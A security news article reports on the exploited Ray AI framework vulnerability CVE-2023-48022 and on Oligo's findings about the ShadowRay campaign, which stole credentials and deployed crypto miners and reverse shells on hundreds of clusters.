Vulnerability in Ray AI Framework Exploited, Hundreds of Clusters Compromised

Vulnerability in Ray AI Framework Exploited | CyberPro Magazine


Vulnerability Exploited in Ray AI Framework

An application security firm, Oligo, has issued a warning about attackers exploiting a significant vulnerability within the Ray AI framework. This vulnerability, identified as CVE-2023-48022 and disclosed in November 2023, has become a gateway for cybercriminals to infiltrate and compromise numerous clusters. The flaw stems from a missing authentication mechanism in the Ray framework’s default configuration, leaving it susceptible to exploitation. In essence, the framework lacks a robust authentication protocol and does not support any form of authorization model, rendering it vulnerable to malicious activities.

Attackers Exploit Vulnerability, Inflicting Widespread Damage

Exploiting this vulnerability, attackers have been able to breach hundreds of Ray clusters, according to reports from Oligo. By leveraging Ray’s job submission API, attackers can execute arbitrary system commands, granting them unauthorized access to all nodes within the cluster and facilitating the retrieval of critical credentials. The compromised clusters have become a treasure trove for cybercriminals, who have pilfered various sensitive information, including AI production workload data, database credentials, password hashes, SSH keys, and tokens from prominent platforms like OpenAI, HuggingFace, and Stripe. 

Moreover, several compromised clusters operated with elevated privileges, providing access to sensitive cloud services and potentially compromising customer data. Additionally, these breaches have exposed Kubernetes API access and Slack tokens, exacerbating the security risks posed by the exploitation of this vulnerability.

Oligo Unveils Scope of Attack and Detection Challenges

Oligo, which has dubbed the ongoing attack campaign as ShadowRay, has shed light on the extensive damage caused by the exploitation of this vulnerability. The security firm has observed a proliferation of crypto miners, including XMRig, NBMiner, and Java-based Zephyr miners, along with the deployment of reverse shells for persistent access across compromised clusters. Notably, the first instance of a crypto-miner was detected in February 2024, indicating that the breach might have commenced before the vulnerability’s public disclosure. 

Furthermore, Oligo highlights the sophisticated tactics employed by the attackers to evade detection, such as leveraging the Interactsh open-source service for connection requests. Compounded by the disputed nature of the exploited vulnerability, organizations remain unaware of their susceptibility to such attacks, amplifying the challenges in detecting and mitigating these threats effectively.

In conclusion, the exploitation of the vulnerability in the Ray AI framework underscores the critical importance of implementing robust authentication mechanisms and security protocols in AI infrastructure. As organizations grapple with the evolving threat landscape, collaborative efforts between developers, security experts, and end-users are imperative to fortify defenses against such malicious incursions.